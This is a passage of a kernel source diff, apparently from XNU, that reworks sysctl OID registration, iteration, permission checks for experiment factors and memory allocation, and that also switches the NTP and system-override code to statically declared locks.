-                * a hash of oid_arg1 for robustness against memory corruption.
-                */
-               oidp->oid_handler = ptrauth_auth_and_resign(oidp->oid_handler,
-                   ptrauth_key_function_pointer,
-                   ptrauth_function_pointer_type_discriminator(typeof(oidp->oid_handler)),
-                   ptrauth_key_function_pointer,
-                   ptrauth_blend_discriminator(&oidp->oid_handler,
-                   os_hash_kernel_pointer(oidp->oid_arg1)));
-       }
-#endif /* defined(HAS_APPLE_PAC) */
+__startup_func
+void
+sysctl_register_oid_early(struct sysctl_oid *oidp)
+{
+       assert((oidp->oid_kind & CTLFLAG_OID2) &&
+           (oidp->oid_kind & CTLFLAG_PERMANENT) &&
+           oidp->oid_version == SYSCTL_OID_VERSION);
+       assert(startup_phase < STARTUP_SUB_SYSCTL);
 
        /*
-        * Insert the oid into the parent's list in order.
+        * Clear the flag so that callers can use sysctl_register_oid_early
+        * again if they wish to register their node.
         */
-       q = NULL;
-       SLIST_FOREACH(p, parent, oid_link) {
-               if (oidp->oid_number == p->oid_number) {
-                       panic("attempting to register a sysctl at previously registered slot : %d", oidp->oid_number);
-               } else if (oidp->oid_number < p->oid_number) {
-                       break;
-               }
-               q = p;
-       }
-       if (q) {
-               SLIST_INSERT_AFTER(q, oidp, oid_link);
-       } else {
-               SLIST_INSERT_HEAD(parent, oidp, oid_link);
+       if (oidp->oid_kind & CTLFLAG_NOAUTO) {
+               oidp->oid_kind &= ~CTLFLAG_NOAUTO;
+               return;
        }
 
-       /* Release the write lock */
-       lck_rw_unlock_exclusive(sysctl_geometry_lock);
+       sysctl_register_oid_locked(oidp, oidp);
 }
 
 void
@@ -261,12 +320,20 @@ sysctl_unregister_oid(struct sysctl_oid *oidp)
        struct sysctl_oid *removed_oidp = NULL; /* OID removed from tree */
 #if __x86_64__
        struct sysctl_oid *old_oidp = NULL;     /* OID compatibility copy */
-#else
-       struct sysctl_oid *const old_oidp = NULL;
 #endif
+       struct sysctl_oid_list *lsp;
 
        /* Get the write lock to modify the geometry */
-       lck_rw_lock_exclusive(sysctl_geometry_lock);
+       lck_rw_lock_exclusive(&sysctl_geometry_lock);
+
+       lsp = oidp->oid_parent;
+       if (SLIST_FIRST(lsp) && SLIST_FIRST(lsp)->oid_number == OID_MUTABLE_ANCHOR) {
+               lsp = SLIST_FIRST(lsp)->oid_arg1;
+       }
+
+       if (oidp->oid_kind & CTLFLAG_PERMANENT) {
+               panic("Trying to unregister permanent sysctl %p", oidp);
+       }
 
        if (!(oidp->oid_kind & CTLFLAG_OID2)) {
 #if __x86_64__
@@ -276,13 +343,13 @@ sysctl_unregister_oid(struct sysctl_oid *oidp)
                 * partial structure; when we find a match, we remove it
                 * normally and free the memory.
                 */
-               SLIST_FOREACH(old_oidp, oidp->oid_parent, oid_link) {
+               SLIST_FOREACH(old_oidp, lsp, oid_link) {
                        if (!memcmp(&oidp->oid_number, &old_oidp->oid_number, (offsetof(struct sysctl_oid, oid_descr) - offsetof(struct sysctl_oid, oid_number)))) {
                                break;
                        }
                }
                if (old_oidp != NULL) {
-                       SLIST_REMOVE(old_oidp->oid_parent, old_oidp, sysctl_oid, oid_link);
+                       SLIST_REMOVE(lsp, old_oidp, sysctl_oid, oid_link);
                        removed_oidp = old_oidp;
                }
 #else
@@ -293,7 +360,7 @@ sysctl_unregister_oid(struct sysctl_oid *oidp)
                switch (oidp->oid_version) {
                case SYSCTL_OID_VERSION:
                        /* We can just remove the OID directly... */
-                       SLIST_REMOVE(oidp->oid_parent, oidp, sysctl_oid, oid_link);
+                       SLIST_REMOVE(lsp, oidp, sysctl_oid, oid_link);
                        removed_oidp = oidp;
                        break;
                default:
@@ -303,7 +370,7 @@ sysctl_unregister_oid(struct sysctl_oid *oidp)
        }
 
 #if defined(HAS_APPLE_PAC)
-       if (removed_oidp && removed_oidp->oid_handler && old_oidp == NULL) {
+       if (removed_oidp && removed_oidp->oid_handler) {
                /*
                 * Revert address-discriminated signing performed by
                 * sysctl_register_oid() (in case this oid is registered again).
@@ -326,47 +393,17 @@ sysctl_unregister_oid(struct sysctl_oid *oidp)
         * Note:        oidp could be NULL if it wasn't found.
         */
        while (removed_oidp && removed_oidp->oid_refcnt) {
-               lck_rw_sleep(sysctl_geometry_lock, LCK_SLEEP_EXCLUSIVE, &removed_oidp->oid_refcnt, THREAD_UNINT);
+               lck_rw_sleep(&sysctl_geometry_lock, LCK_SLEEP_EXCLUSIVE,
+                   &removed_oidp->oid_refcnt, THREAD_UNINT);
        }
 
        /* Release the write lock */
-       lck_rw_unlock_exclusive(sysctl_geometry_lock);
+       lck_rw_unlock_exclusive(&sysctl_geometry_lock);
 
-       if (old_oidp != NULL) {
 #if __x86_64__
-               /* If it was allocated, free it after dropping the lock */
-               FREE(old_oidp, M_TEMP);
+       /* If it was allocated, free it after dropping the lock */
+       kheap_free(KHEAP_DEFAULT, old_oidp, sizeof(struct sysctl_oid));
 #endif
-       }
-}
-
-/*
- * Bulk-register all the oids in a linker_set.
- */
-void
-sysctl_register_set(const char *set)
-{
-       struct sysctl_oid **oidpp, *oidp;
-
-       LINKER_SET_FOREACH(oidpp, struct sysctl_oid **, set) {
-               oidp = *oidpp;
-               if (!(oidp->oid_kind & CTLFLAG_NOAUTO)) {
-                       sysctl_register_oid(oidp);
-               }
-       }
-}
-
-void
-sysctl_unregister_set(const char *set)
-{
-       struct sysctl_oid **oidpp, *oidp;
-
-       LINKER_SET_FOREACH(oidpp, struct sysctl_oid **, set) {
-               oidp = *oidpp;
-               if (!(oidp->oid_kind & CTLFLAG_NOAUTO)) {
-                       sysctl_unregister_oid(oidp);
-               }
-       }
 }
 
 /*
@@ -379,28 +416,6 @@ sysctl_register_fixed(void)
 }
 #endif
 
-/*
- * Register the kernel's oids on startup.
- */
-
-void
-sysctl_early_init(void)
-{
-       /*
-        * Initialize the geometry lock for reading/modifying the
-        * sysctl tree. This is done here because IOKit registers
-        * some sysctl's before bsd_init() would otherwise perform
-        * subsystem initialization.
-        */
-
-       sysctl_lock_group  = lck_grp_alloc_init("sysctl", NULL);
-       sysctl_geometry_lock = lck_rw_alloc_init(sysctl_lock_group, NULL);
-       sysctl_unlocked_node_lock = lck_mtx_alloc_init(sysctl_lock_group, NULL);
-
-       sysctl_register_set("__sysctl_set");
-       sysctl_load_devicetree_entries();
-}
-
 /*
  * New handler interface
  *   If the sysctl caller (user mode or kernel mode) is interested in the
@@ -553,6 +568,94 @@ sysctl_io_opaque(struct sysctl_req *req, void *pValue, size_t valueSize, int *ch
        return error;
 }
 
+/*
+ * SYSCTL_OID enumerators
+ *
+ * Because system OIDs are immutable, they are composed of 2 lists hanging from
+ * a first dummy OID_MUTABLE_ANCHOR node that has an immutable list hanging from
+ * its `oid_parent` field and a mutable list hanging from its oid_arg1 one.
+ *
+ * Those enumerators abstract away the implicit merging of those two lists in
+ * two possible order:
+ * - oid_number order (which will interleave both sorted lists)
+ * - system order which will list the immutable list first,
+ *   and the mutable list second.
+ */
+struct sysctl_oid_iterator {
+       struct sysctl_oid *a;
+       struct sysctl_oid *b;
+};
+
+static struct sysctl_oid_iterator
+sysctl_oid_iterator_begin(struct sysctl_oid_list *l)
+{
+       struct sysctl_oid_iterator it = { };
+       struct sysctl_oid *a = SLIST_FIRST(l);
+
+       if (a == NULL) {
+               return it;
+       }
+
+       if (a->oid_number == OID_MUTABLE_ANCHOR) {
+               it.a = SLIST_NEXT(a, oid_link);
+               it.b = SLIST_FIRST((struct sysctl_oid_list *)a->oid_arg1);
+       } else {
+               it.a = a;
+       }
+       return it;
+}
+
+static struct sysctl_oid *
+sysctl_oid_iterator_next_num_order(struct sysctl_oid_iterator *it)
+{
+       struct sysctl_oid *a = it->a;
+       struct sysctl_oid *b = it->b;
+
+       if (a == NULL && b == NULL) {
+               return NULL;
+       }
+
+       if (a == NULL) {
+               it->b = SLIST_NEXT(b, oid_link);
+               return b;
+       }
+
+       if (b == NULL || a->oid_number <= b->oid_number) {
+               it->a = SLIST_NEXT(a, oid_link);
+               return a;
+       }
+
+       it->b = SLIST_NEXT(b, oid_link);
+       return b;
+}
+
+#define SYSCTL_OID_FOREACH_NUM_ORDER(oidp, l) \
+       for (struct sysctl_oid_iterator it = sysctl_oid_iterator_begin(l); \
+               ((oidp) = sysctl_oid_iterator_next_num_order(&it)); )
+
+static struct sysctl_oid *
+sysctl_oid_iterator_next_system_order(struct sysctl_oid_iterator *it)
+{
+       struct sysctl_oid *a = it->a;
+       struct sysctl_oid *b = it->b;
+
+       if (a) {
+               it->a = SLIST_NEXT(a, oid_link);
+               return a;
+       }
+
+       if (b) {
+               it->b = SLIST_NEXT(b, oid_link);
+               return b;
+       }
+
+       return NULL;
+}
+
+#define SYSCTL_OID_FOREACH_SYS_ORDER(oidp, l) \
+       for (struct sysctl_oid_iterator it = sysctl_oid_iterator_begin(l); \
+               ((oidp) = sysctl_oid_iterator_next_system_order(&it)); )
+
 /*
  * "Staff-functions"
  *
@@ -599,38 +702,50 @@ sysctl_io_opaque(struct sysctl_req *req, void *pValue, size_t valueSize, int *ch
 STATIC void
 sysctl_sysctl_debug_dump_node(struct sysctl_oid_list *l, int i)
 {
-       int k;
        struct sysctl_oid *oidp;
+       struct sysctl_oid_list *lp;
+       const char *what;
 
-       SLIST_FOREACH(oidp, l, oid_link) {
-               for (k = 0; k < i; k++) {
-                       printf(" ");
+       SYSCTL_OID_FOREACH_SYS_ORDER(oidp, l) {
+               switch (oidp->oid_kind & CTLTYPE) {
+               case CTLTYPE_NODE:
+                       lp = oidp->oid_arg1;
+                       what = "Node   ";
+                       if (lp && SLIST_FIRST(lp) &&
+                           SLIST_FIRST(lp)->oid_number == OID_MUTABLE_ANCHOR) {
+                               what = "NodeExt";
+                       } else {
+                       }
+                       break;
+               case CTLTYPE_INT:
+                       what = "Int    ";
+                       break;
+               case CTLTYPE_STRING:
+                       what = "String ";
+                       break;
+               case CTLTYPE_QUAD:
+                       what = "Quad   ";
+                       break;
+               case CTLTYPE_OPAQUE:
+                       what = "Opaque ";
+                       break;
+               default:
+                       what = "Unknown";
+                       break;
                }
 
-               printf("%d %s ", oidp->oid_number, oidp->oid_name);
-
-               printf("%c%c%c",
+               printf("%*s%-3d[%c%c%c%c%c] %s %s\n", i, "", oidp->oid_number,
                    oidp->oid_kind & CTLFLAG_LOCKED ? 'L':' ',
                    oidp->oid_kind & CTLFLAG_RD ? 'R':' ',
-                   oidp->oid_kind & CTLFLAG_WR ? 'W':' ');
-
-               if (oidp->oid_handler) {
-                       printf(" *Handler");
-               }
+                   oidp->oid_kind & CTLFLAG_WR ? 'W':' ',
+                   oidp->oid_kind & CTLFLAG_PERMANENT ? ' ':'*',
+                   oidp->oid_handler ? 'h' : ' ',
+                   what, oidp->oid_name);
 
-               switch (oidp->oid_kind & CTLTYPE) {
-               case CTLTYPE_NODE:
-                       printf(" Node\n");
+               if ((oidp->oid_kind & CTLTYPE) == CTLTYPE_NODE) {
                        if (!oidp->oid_handler) {
-                               sysctl_sysctl_debug_dump_node(
-                                       oidp->oid_arg1, i + 2);
+                               sysctl_sysctl_debug_dump_node(lp, i + 2);
                        }
-                       break;
-               case CTLTYPE_INT:    printf(" Int\n"); break;
-               case CTLTYPE_STRING: printf(" String\n"); break;
-               case CTLTYPE_QUAD:   printf(" Quad\n"); break;
-               case CTLTYPE_OPAQUE: printf(" Opaque/struct\n"); break;
-               default:             printf("\n");
                }
        }
 }
@@ -656,9 +771,9 @@ STATIC int
 sysctl_sysctl_debug(__unused struct sysctl_oid *oidp, __unused void *arg1,
     __unused int arg2, __unused struct sysctl_req *req)
 {
-       lck_rw_lock_shared(sysctl_geometry_lock);
+       lck_rw_lock_shared(&sysctl_geometry_lock);
        sysctl_sysctl_debug_dump_node(&sysctl__children, 0);
-       lck_rw_done(sysctl_geometry_lock);
+       lck_rw_done(&sysctl_geometry_lock);
        return ENOENT;
 }
 
@@ -722,7 +837,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2,
        struct sysctl_oid_list *lsp = &sysctl__children, *lsp2;
        char tempbuf[10] = {};
 
-       lck_rw_lock_shared(sysctl_geometry_lock);
+       lck_rw_lock_shared(&sysctl_geometry_lock);
        while (namelen) {
                if (!lsp) {
                        snprintf(tempbuf, sizeof(tempbuf), "%d", *name);
@@ -733,7 +848,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2,
                                error = SYSCTL_OUT(req, tempbuf, strlen(tempbuf));
                        }
                        if (error) {
-                               lck_rw_done(sysctl_geometry_lock);
+                               lck_rw_done(&sysctl_geometry_lock);
                                return error;
                        }
                        namelen--;
@@ -741,7 +856,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2,
                        continue;
                }
                lsp2 = 0;
-               SLIST_FOREACH(oid, lsp, oid_link) {
+               SYSCTL_OID_FOREACH_NUM_ORDER(oid, lsp) {
                        if (oid->oid_number != *name) {
                                continue;
                        }
@@ -754,7 +869,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2,
                                    strlen(oid->oid_name));
                        }
                        if (error) {
-                               lck_rw_done(sysctl_geometry_lock);
+                               lck_rw_done(&sysctl_geometry_lock);
                                return error;
                        }
 
@@ -774,7 +889,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2,
                }
                lsp = lsp2;
        }
-       lck_rw_done(sysctl_geometry_lock);
+       lck_rw_done(&sysctl_geometry_lock);
        return SYSCTL_OUT(req, "", 1);
 }
 
@@ -819,7 +934,7 @@ sysctl_sysctl_next_ls(struct sysctl_oid_list *lsp, int *name, u_int namelen,
        struct sysctl_oid *oidp;
 
        *len = level;
-       SLIST_FOREACH(oidp, lsp, oid_link) {
+       SYSCTL_OID_FOREACH_NUM_ORDER(oidp, lsp) {
                *next = oidp->oid_number;
                *oidpp = oidp;
 
@@ -932,9 +1047,9 @@ sysctl_sysctl_next(__unused struct sysctl_oid *oidp, void *arg1, int arg2,
        struct sysctl_oid_list *lsp = &sysctl__children;
        int newoid[CTL_MAXNAME] = {};
 
-       lck_rw_lock_shared(sysctl_geometry_lock);
+       lck_rw_lock_shared(&sysctl_geometry_lock);
        i = sysctl_sysctl_next_ls(lsp, name, namelen, newoid, &j, 1, &oid);
-       lck_rw_done(sysctl_geometry_lock);
+       lck_rw_done(&sysctl_geometry_lock);
        if (i) {
                return ENOENT;
        }
@@ -966,10 +1081,10 @@ SYSCTL_NODE(_sysctl, 2, next, CTLFLAG_RD | CTLFLAG_LOCKED, sysctl_sysctl_next, "
 STATIC int
 name2oid(char *name, int *oid, size_t *len)
 {
-       char i;
+       struct sysctl_oid_iterator it;
        struct sysctl_oid *oidp;
-       struct sysctl_oid_list *lsp = &sysctl__children;
        char *p;
+       char i;
 
        if (!*name) {
                return ENOENT;
@@ -990,11 +1105,12 @@ name2oid(char *name, int *oid, size_t *len)
                *p = '\0';
        }
 
-       oidp = SLIST_FIRST(lsp);
+       it = sysctl_oid_iterator_begin(&sysctl__children);
+       oidp = sysctl_oid_iterator_next_system_order(&it);
 
        while (oidp && *len < CTL_MAXNAME) {
                if (strcmp(name, oidp->oid_name)) {
-                       oidp = SLIST_NEXT(oidp, oid_link);
+                       oidp = sysctl_oid_iterator_next_system_order(&it);
                        continue;
                }
                *oid++ = oidp->oid_number;
@@ -1012,8 +1128,9 @@ name2oid(char *name, int *oid, size_t *len)
                        break;
                }
 
-               lsp = (struct sysctl_oid_list *)oidp->oid_arg1;
-               oidp = SLIST_FIRST(lsp);
+               it = sysctl_oid_iterator_begin(oidp->oid_arg1);
+               oidp = sysctl_oid_iterator_next_system_order(&it);
+
                *p = i; /* restore */
                name = p + 1;
                for (p = name; *p && *p != '.'; p++) {
@@ -1081,14 +1198,14 @@ sysctl_sysctl_name2oid(__unused struct sysctl_oid *oidp, __unused void *arg1,
                return ENAMETOOLONG;
        }
 
-       MALLOC(p, char *, req->newlen + 1, M_TEMP, M_WAITOK);
+       p = kheap_alloc(KHEAP_TEMP, req->newlen + 1, Z_WAITOK);
        if (!p) {
                return ENOMEM;
        }
 
        error = SYSCTL_IN(req, p, req->newlen);
        if (error) {
-               FREE(p, M_TEMP);
+               kheap_free(KHEAP_TEMP, p, req->newlen + 1);
                return error;
        }
 
@@ -1098,11 +1215,11 @@ sysctl_sysctl_name2oid(__unused struct sysctl_oid *oidp, __unused void *arg1,
         * Note:        We acquire and release the geometry lock here to
         *              avoid making name2oid needlessly complex.
         */
-       lck_rw_lock_shared(sysctl_geometry_lock);
+       lck_rw_lock_shared(&sysctl_geometry_lock);
        error = name2oid(p, oid, &len);
-       lck_rw_done(sysctl_geometry_lock);
+       lck_rw_done(&sysctl_geometry_lock);
 
-       FREE(p, M_TEMP);
+       kheap_free(KHEAP_TEMP, p, req->newlen + 1);
 
        if (error) {
                return error;
@@ -1160,11 +1277,13 @@ sysctl_sysctl_oidfmt(__unused struct sysctl_oid *oidp, void *arg1, int arg2,
        int error = ENOENT;             /* default error: not found */
        u_int namelen = arg2;
        u_int indx;
+       struct sysctl_oid_iterator it;
        struct sysctl_oid *oid;
-       struct sysctl_oid_list *lsp = &sysctl__children;
 
-       lck_rw_lock_shared(sysctl_geometry_lock);
-       oid = SLIST_FIRST(lsp);
+       lck_rw_lock_shared(&sysctl_geometry_lock);
+
+       it = sysctl_oid_iterator_begin(&sysctl__children);
+       oid = sysctl_oid_iterator_next_system_order(&it);
 
        indx = 0;
        while (oid && indx < CTL_MAXNAME) {
@@ -1177,8 +1296,8 @@ sysctl_sysctl_oidfmt(__unused struct sysctl_oid *oidp, void *arg1, int arg2,
                                if (indx == namelen) {
                                        goto found;
                                }
-                               lsp = (struct sysctl_oid_list *)oid->oid_arg1;
-                               oid = SLIST_FIRST(lsp);
+                               it = sysctl_oid_iterator_begin(oid->oid_arg1);
+                               oid = sysctl_oid_iterator_next_system_order(&it);
                        } else {
                                if (indx != namelen) {
                                        error =  EISDIR;
@@ -1187,7 +1306,7 @@ sysctl_sysctl_oidfmt(__unused struct sysctl_oid *oidp, void *arg1, int arg2,
                                goto found;
                        }
                } else {
-                       oid = SLIST_NEXT(oid, oid_link);
+                       oid = sysctl_oid_iterator_next_system_order(&it);
                }
        }
        /* Not found */
@@ -1204,7 +1323,7 @@ found:
                    strlen(oid->oid_fmt) + 1);
        }
 err:
-       lck_rw_done(sysctl_geometry_lock);
+       lck_rw_done(&sysctl_geometry_lock);
        return error;
 }
 
@@ -1448,25 +1567,46 @@ sysctl_new_user(struct sysctl_req *req, void *p, size_t l)
        return error;
 }
 
+#define WRITE_EXPERIMENT_FACTORS_ENTITLEMENT "com.apple.private.write-kr-experiment-factors"
+/*
+ * Is the current task allowed to write to experiment factors?
+ * tasks with the WRITE_EXPERIMENT_FACTORS_ENTITLEMENT are always allowed to write these.
+ * In the development / debug kernel we also allow root to write them.
+ */
+STATIC bool
+can_write_experiment_factors(__unused struct sysctl_req *req)
+{
+       if (IOTaskHasEntitlement(current_task(), WRITE_EXPERIMENT_FACTORS_ENTITLEMENT)) {
+               return true;
+       }
+#if DEBUG || DEVELOPMENT
+       return !proc_suser(req->p);
+#else
+       return false;
+#endif /* DEBUG || DEVELOPMENT */
+}
+
 /*
  * Traverse our tree, and find the right node, execute whatever it points
  * at, and return the resulting error code.
  */
 
 int
-sysctl_root(boolean_t from_kernel, boolean_t string_is_canonical, char *namestring, size_t namestringlen, int *name, size_t namelen, struct sysctl_req *req)
+sysctl_root(boolean_t from_kernel, boolean_t string_is_canonical,
+    char *namestring, size_t namestringlen,
+    int *name, size_t namelen, struct sysctl_req *req)
 {
        u_int indx;
        int i;
+       struct sysctl_oid_iterator it;
        struct sysctl_oid *oid;
-       struct sysctl_oid_list *lsp = &sysctl__children;
        sysctl_handler_t oid_handler = NULL;
        int error;
        boolean_t unlocked_node_found = FALSE;
        boolean_t namestring_started = FALSE;
 
        /* Get the read lock on the geometry */
-       lck_rw_lock_shared(sysctl_geometry_lock);
+       lck_rw_lock_shared(&sysctl_geometry_lock);
 
        if (string_is_canonical) {
                /* namestring is actually canonical, name/namelen needs to be populated */
@@ -1476,7 +1616,8 @@ sysctl_root(boolean_t from_kernel, boolean_t string_is_canonical, char *namestri
                }
        }
 
-       oid = SLIST_FIRST(lsp);
+       it = sysctl_oid_iterator_begin(&sysctl__children);
+       oid = sysctl_oid_iterator_next_system_order(&it);
 
        indx = 0;
        while (oid && indx < CTL_MAXNAME) {
@@ -1524,8 +1665,8 @@ sysctl_root(boolean_t from_kernel, boolean_t string_is_canonical, char *namestri
                                        goto err;
                                }
 
-                               lsp = (struct sysctl_oid_list *)oid->oid_arg1;
-                               oid = SLIST_FIRST(lsp);
+                               it = sysctl_oid_iterator_begin(oid->oid_arg1);
+                               oid = sysctl_oid_iterator_next_system_order(&it);
                        } else {
                                if (indx != namelen) {
                                        error = EISDIR;
@@ -1534,7 +1675,7 @@ sysctl_root(boolean_t from_kernel, boolean_t string_is_canonical, char *namestri
                                goto found;
                        }
                } else {
-                       oid = SLIST_NEXT(oid, oid_link);
+                       oid = sysctl_oid_iterator_next_system_order(&it);
                }
        }
        error = ENOENT;
@@ -1582,18 +1723,30 @@ found:
                goto err;
        }
 
-       /*
-        * This is where legacy enforcement of permissions occurs.  If the
-        * flag does not say CTLFLAG_ANYBODY, then we prohibit anyone but
-        * root from writing new values down.  If local enforcement happens
-        * at the leaf node, then it needs to be set as CTLFLAG_ANYBODY.  In
-        * addition, if the leaf node is set this way, then in order to do
-        * specific enforcement, it has to be of type SYSCTL_PROC.
-        */
-       if (!(oid->oid_kind & CTLFLAG_ANYBODY) &&
-           req->newptr && req->p &&
-           (error = proc_suser(req->p))) {
-               goto err;
+       if (req->newptr && req->p) {
+               if (oid->oid_kind & CTLFLAG_EXPERIMENT) {
+                       /*
+                        * Experiment factors have different permissions since they need to be
+                        * writable by procs with WRITE_EXPERIMENT_FACTORS_ENTITLEMENT.
+                        */
+                       if (!can_write_experiment_factors(req)) {
+                               error = (EPERM);
+                               goto err;
+                       }
+               } else {
+                       /*
+                        * This is where legacy enforcement of permissions occurs.  If the
+                        * flag does not say CTLFLAG_ANYBODY, then we prohibit anyone but
+                        * root from writing new values down.  If local enforcement happens
+                        * at the leaf node, then it needs to be set as CTLFLAG_ANYBODY.  In
+                        * addition, if the leaf node is set this way, then in order to do
+                        * specific enforcement, it has to be of type SYSCTL_PROC.
+                        */
+                       if (!(oid->oid_kind & CTLFLAG_ANYBODY) &&
+                           (error = proc_suser(req->p))) {
+                               goto err;
+                       }
+               }
        }
 
        /*
@@ -1612,9 +1765,11 @@ found:
         * not prevent other calls into handlers or calls to manage the
         * geometry elsewhere from blocking...
         */
-       OSAddAtomic(1, &oid->oid_refcnt);
+       if ((oid->oid_kind & CTLFLAG_PERMANENT) == 0) {
+               OSAddAtomic(1, &oid->oid_refcnt);
+       }
 
-       lck_rw_done(sysctl_geometry_lock);
+       lck_rw_done(&sysctl_geometry_lock);
 
 #if CONFIG_MACF
        if (!from_kernel) {
@@ -1637,7 +1792,7 @@ found:
         * may be into code whose reentrancy is protected by it.
         */
        if (unlocked_node_found) {
-               lck_mtx_lock(sysctl_unlocked_node_lock);
+               lck_mtx_lock(&sysctl_unlocked_node_lock);
        }
 
 #if defined(HAS_APPLE_PAC)
@@ -1660,7 +1815,7 @@ found:
        error = i;
 
        if (unlocked_node_found) {
-               lck_mtx_unlock(sysctl_unlocked_node_lock);
+               lck_mtx_unlock(&sysctl_unlocked_node_lock);
        }
 
 #if CONFIG_MACF
@@ -1682,13 +1837,16 @@ dropref:
         *              barrier to avoid waking every time through on "hot"
         *              OIDs.
         */
-       lck_rw_lock_shared(sysctl_geometry_lock);
-       if (OSAddAtomic(-1, &oid->oid_refcnt) == 1) {
-               wakeup(&oid->oid_refcnt);
+       lck_rw_lock_shared(&sysctl_geometry_lock);
+
+       if ((oid->oid_kind & CTLFLAG_PERMANENT) == 0) {
+               if (OSAddAtomic(-1, &oid->oid_refcnt) == 1) {
+                       wakeup(&oid->oid_refcnt);
+               }
        }
 
 err:
-       lck_rw_done(sysctl_geometry_lock);
+       lck_rw_done(&sysctl_geometry_lock);
        return error;
 }
 
@@ -1767,7 +1925,7 @@ sysctl(proc_t p, struct sysctl_args *uap, __unused int32_t *retval)
                }
        }
 
-       MALLOC(namestring, char *, namestringlen, M_TEMP, M_WAITOK);
+       namestring = kheap_alloc(KHEAP_TEMP, namestringlen, Z_WAITOK);
        if (!namestring) {
                oldlen = 0;
                goto err;
@@ -1775,7 +1933,7 @@ sysctl(proc_t p, struct sysctl_args *uap, __unused int32_t *retval)
 
        error = userland_sysctl(FALSE, namestring, namestringlen, name, uap->namelen, &req, &oldlen);
 
-       FREE(namestring, M_TEMP);
+       kheap_free(KHEAP_TEMP, namestring, namestringlen);
 
        if ((error) && (error != ENOMEM)) {
                return error;
@@ -1813,14 +1971,14 @@ sys_sysctlbyname(proc_t p, struct sysctlbyname_args *uap, __unused int32_t *retv
        }
        namelen = (size_t)uap->namelen;
 
-       MALLOC(name, char *, namelen + 1, M_TEMP, M_WAITOK);
+       name = kheap_alloc(KHEAP_TEMP, namelen + 1, Z_WAITOK);
        if (!name) {
                return ENOMEM;
        }
 
        error = copyin(uap->name, name, namelen);
        if (error) {
-               FREE(name, M_TEMP);
+               kheap_free(KHEAP_TEMP, name, namelen + 1);
                return error;
        }
        name[namelen] = '\0';
@@ -1830,7 +1988,7 @@ sys_sysctlbyname(proc_t p, struct sysctlbyname_args *uap, __unused int32_t *retv
         */
 
        if (uap->newlen > SIZE_T_MAX) {
-               FREE(name, M_TEMP);
+               kheap_free(KHEAP_TEMP, name, namelen + 1);
                return EINVAL;
        }
        newlen = (size_t)uap->newlen;
@@ -1852,7 +2010,7 @@ sys_sysctlbyname(proc_t p, struct sysctlbyname_args *uap, __unused int32_t *retv
 
        error = userland_sysctl(TRUE, name, namelen + 1, oid, CTL_MAXNAME, &req, &oldlen);
 
-       FREE(name, M_TEMP);
+       kheap_free(KHEAP_TEMP, name, namelen + 1);
 
        if ((error) && (error != ENOMEM)) {
                return error;
@@ -1946,3 +2104,44 @@ kernel_sysctlbyname(const char *name, void *oldp, size_t *oldlenp, void *newp, s
        }
        return error;
 }
+
+int
+scalable_counter_sysctl_handler SYSCTL_HANDLER_ARGS
+{
+#pragma unused(arg2, oidp)
+       scalable_counter_t counter = *(scalable_counter_t*) arg1;
+       uint64_t value = counter_load(&counter);
+       return SYSCTL_OUT(req, &value, sizeof(value));
+}
+
+#define X(name, T) \
+int \
+experiment_factor_##name##_handler SYSCTL_HANDLER_ARGS \
+{ \
+       int error, changed = 0; \
+       T *ptr; \
+       T new_value, current_value; \
+       struct experiment_spec *spec = (struct experiment_spec *) arg1; \
+       if (!arg1) { \
+               return EINVAL; \
+       } \
+       ptr = (T *)(spec->ptr); \
+       current_value = *ptr; \
+       error = sysctl_io_number(req, current_value, sizeof(T), &new_value, &changed); \
+       if (error != 0) { \
+               return error; \
+       } \
+       if (changed) { \
+               if (new_value < (T) spec->min_value || new_value > (T) spec->max_value) { \
+                       return EINVAL; \
+               } \
+               if (os_atomic_cmpxchg(&spec->modified, false, true, acq_rel)) { \
+                       spec->original_value = current_value; \
+               } \
+               os_atomic_store_wide(ptr, new_value, relaxed); \
+       } \
+       return 0; \
+}
+
+experiment_factor_numeric_types
+#undef X
index 0ae62258f0b304f77de3cd36c3a07953c6c4c588..cbabd104b52baabc1ee5afa4992789704e14db8b 100644 (file)
@@ -187,20 +187,18 @@ static l_fp time_freq;
 static int64_t time_adjtime;
 static int updated;
 
-static lck_spin_t * ntp_lock;
-static lck_grp_t * ntp_lock_grp;
-static lck_attr_t * ntp_lock_attr;
-static lck_grp_attr_t   *ntp_lock_grp_attr;
+static LCK_GRP_DECLARE(ntp_lock_grp, "ntp_lock");
+static LCK_SPIN_DECLARE(ntp_lock, &ntp_lock_grp);
 
 #define NTP_LOCK(enable) \
                enable =  ml_set_interrupts_enabled(FALSE); \
-               lck_spin_lock(ntp_lock);
+               lck_spin_lock(&ntp_lock);
 
 #define NTP_UNLOCK(enable) \
-               lck_spin_unlock(ntp_lock);\
+               lck_spin_unlock(&ntp_lock);\
                ml_set_interrupts_enabled(enable);
 
-#define NTP_ASSERT_LOCKED()     LCK_SPIN_ASSERT(ntp_lock, LCK_ASSERT_OWNED)
+#define NTP_ASSERT_LOCKED()     LCK_SPIN_ASSERT(&ntp_lock, LCK_ASSERT_OWNED)
 
 static timer_call_data_t ntp_loop_update;
 static uint64_t ntp_loop_deadline;
@@ -831,17 +829,5 @@ init_ntp_loop(void)
 void
 ntp_init(void)
 {
-       L_CLR(time_offset);
-       L_CLR(time_freq);
-
-       ntp_lock_grp_attr = lck_grp_attr_alloc_init();
-       ntp_lock_grp =  lck_grp_alloc_init("ntp_lock", ntp_lock_grp_attr);
-       ntp_lock_attr = lck_attr_alloc_init();
-       ntp_lock = lck_spin_alloc_init(ntp_lock_grp, ntp_lock_attr);
-
-       updated = 0;
-
        init_ntp_loop();
 }
-
-SYSINIT(ntpclocks, SI_SUB_CLOCKS, SI_ORDER_MIDDLE, ntp_init, NULL);
index 695d335b796c467fecedd0fac728c6aeb6d912b4..ca29c90797e1a8d19a048d18fce629c545049dd1 100644 (file)
 #include <sys/kern_memorystatus.h>
 
 /* Mutex for global system override state */
-static lck_mtx_t        sys_override_lock;
-static lck_grp_t        *sys_override_mtx_grp;
-static lck_attr_t       *sys_override_mtx_attr;
-static lck_grp_attr_t   *sys_override_mtx_grp_attr;
+static LCK_GRP_DECLARE(sys_override_mtx_grp, "system_override");
+static LCK_MTX_DECLARE(sys_override_lock, &sys_override_mtx_grp);
 
 /*
